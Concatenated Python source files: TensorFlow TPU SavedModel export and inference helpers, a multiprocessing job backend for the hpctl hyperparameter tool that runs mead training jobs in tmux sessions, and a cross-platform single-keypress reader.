def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(
features,
computation,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn,
labels,
config,
params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts computation on TPU, add batching around it and round robin computation
between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@batch_ops.batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
|
mp.py | from __future__ import absolute_import, division, print_function, unicode_literals
from six.moves import zip, map, range
import os
import sys
import json
import traceback
from copy import deepcopy
from multiprocessing import Process
from subprocess import check_call, call, CalledProcessError
import mead
from baseline.utils import export as exporter
from baseline.utils import write_json, redirect
from hpctl.results import States
from hpctl.utils import create_logs, Label
from hpctl.backend import LocalGPUBackend, Runner, register_backend
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
__all__ = []
export = exporter(__all__)
def run_job(
label,
config_params,
mead_logs=None, hpctl_logs=None,
settings=None, task_name=None,
datasets=None, embeddings=None,
gpus=None, **kwargs
):
"""Function that runs a meed job.
:param label: Label, The Label (sha1 and human name) of the model.
:param config_params: dict, The config for the job.
:param mead_logs: dict, The mead logging config.
:param hpctl_logs: dict, The hpctl logging config.
:param settings: str, The location of the mead settings file.
:param task_name: str, The name of the mead task.
:param datasets: str, The location of the dataset file.
:param embeddings: str, The location of the embeddings file.
:param gpus: List[str], The list of gpus the process is allowed to use.
"""
# Suppress tensorflow CUDA output
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
if gpus is not None:
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(gpus)
if 'visdom' in config_params.get('reporting', {}):
config_params.get('reporting', {})['visdom']['name'] = label.name
if 'xpctl' in config_params.get('reporting', {}):
config_params.get('reporting', {})['xpctl']['label'] = label.name
config_params['model']['gpus'] = len(gpus)
print(config_params)
write_json(config_params, 'config.json')
logs = create_logs(label, mead_logs, hpctl_logs)
mead.utils.configure_logger(logs)
task = mead.Task.get_task_specific(task_name, settings)
task.read_config(config_params, datasets, config_file=deepcopy(config_params))
task.initialize(embeddings)
task.train()
@export
class FileProcess(Process):
"""A process that writes all stdout to a file.
Output is written to `exp/label/stdout`
:param exp: str, The name of the experiment.
:param label: Label, The Label (sha1 and human name) of the model.
"""
def __init__(self, label, *args, **kwargs):
super(FileProcess, self).__init__(*args, **kwargs)
self.exp = label.exp
self.label = label.sha1
self.name = label.name
self.loc = os.path.join(self.exp, self.label, self.name)
try:
os.makedirs(self.loc)
except OSError:
pass
self.out_file = os.path.join(self.loc, 'stdout')
self.output = open(self.out_file, 'w', buffering=1)
def run(self):
with redirect(sys.stdout, self.output):
os.chdir(self.loc)
setproctitle(self.name)
super(FileProcess, self).run()
def join(self):
super(FileProcess, self).join()
self.output.close()
@export
class TmuxProcess(FileProcess):
"""A process that writes all stdout to a file and sets up tmux to look at it.
Output is written to `exp/label/stdout`
Use tmux with `tmux attach -t human_label`
:param exp: str, The name of the experiment.
:param label: Label, The Label (sha1 and human name) of the model.
"""
def __init__(self, *args, **kwargs):
super(TmuxProcess, self).__init__(*args, **kwargs)
cmd = 'tail -f {}'.format(self.out_file)
with open(os.devnull, 'w') as devnull:
try:
_ = check_call('tmux -V', shell=True, stdout=devnull, stderr=devnull)
self.tmux = True
except CalledProcessError:
self.tmux = False
if self.tmux:
# tmux new-window -n {name} -d would add a window but it only
# add the window to the most recent session. So if you use tmux
# to look at a different experiment then new jobs from this one
# would be added to that session. Once I figure out how to ping
# a session from python we can have this use exp as the session
# name and human in the window, if the call errors we can ping
# the session and then call new-window. Probably need a lock
# so these can't step on each other.
call('tmux new-sess -s {} -n {} -d {}'.format(
self.name, self.name, cmd
), shell=True, stdout=devnull, stderr=devnull)
def join(self):
super(TmuxProcess, self).join()
if self.tmux:
with open(os.devnull, 'w') as devnull:
call('tmux kill-session -t {}'.format(self.name),
shell=True, stdout=devnull, stderr=devnull
)
class MPRunner(Runner):
def __init__(self):
super(MPRunner, self).__init__()
self.p = None
self.name = None
def join(self):
if self.p is None:
return
self.p.join()
def start(self, func, label, *args, **kwargs):
self.name = label.name
args = tuple([label] + list(args))
self.p = TmuxProcess(label, target=func, args=args, kwargs=kwargs)
try:
self.p.start()
except:
print("Failure to start tmux process")
while self.is_done:
pass
@property
def is_done(self):
return True if self.p is None else not self.p.is_alive()
@property
def failed(self):
if self.p is None:
return False
if self.p.exitcode is None:
return False
return self.p.exitcode != 0
def stop(self):
if self.p is None:
return
self.p.terminate()
def __str__(self):
return "<MPRunner: {}>".format(self.name)
def __repr__(self):
return str(self)
@export
@register_backend('mp')
class MPBackend(LocalGPUBackend):
"""Back end that runs multiprocessing jobs.
:param num_jobs: int, The number of concurrent jobs to run.
:param gpus: List[str], The gpus.
"""
def __init__(
self,
**kwargs
):
super(MPBackend, self).__init__(**kwargs)
def launch(
self,
label, config,
mead_logs, hpctl_logs,
settings, datasets,
embeddings, task_name,
**kwargs
):
"""Start a job.
:param label: hpctl.utils.Label, The label for the job.
:param config: dict, the config for the model.
:param exp: hpctl.experiment.Experiment, The experiment data object.
"""
super(MPBackend, self).launch(label)
self._free_resources()
gpu = self._request_gpus(1)
job = MPRunner()
job.start(
run_job,
label, config,
mead_logs=mead_logs,
hpctl_logs=hpctl_logs,
settings=settings,
datasets=datasets,
embeddings=embeddings,
task_name=task_name,
gpus=gpu
)
self.label_to_job[label] = job
self._reserve_gpus(gpu, job)
self.jobs.append(job)
@export
def create_backend(**kwargs):
return MPBackend(**kwargs)
|
getch.py | class _Getch:
"""Gets a single character from standard input. Does not echo to the screen."""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
self.impl = _GetchUnix()
def __call__(self):
return self.impl()
class _GetchUnix:
def __init__(self):
import tty, sys
def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch().decode('utf-8')
getch = _Getch()
# from time import sleep
# import threading
# ready = threading.Event()
#
#
# def inp():
# while True:
# c = getch()
# if c == ' ':
# print("yes")
# if ready.is_set():
# ready.clear()
# else:
# ready.set()
# if c == 'q':
# break
#
#
# k = threading.Thread(target=inp)
# k.start()
#
# ready.set()
# for i in range(15):
# ready.wait()
# sleep(1)
# print('k')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.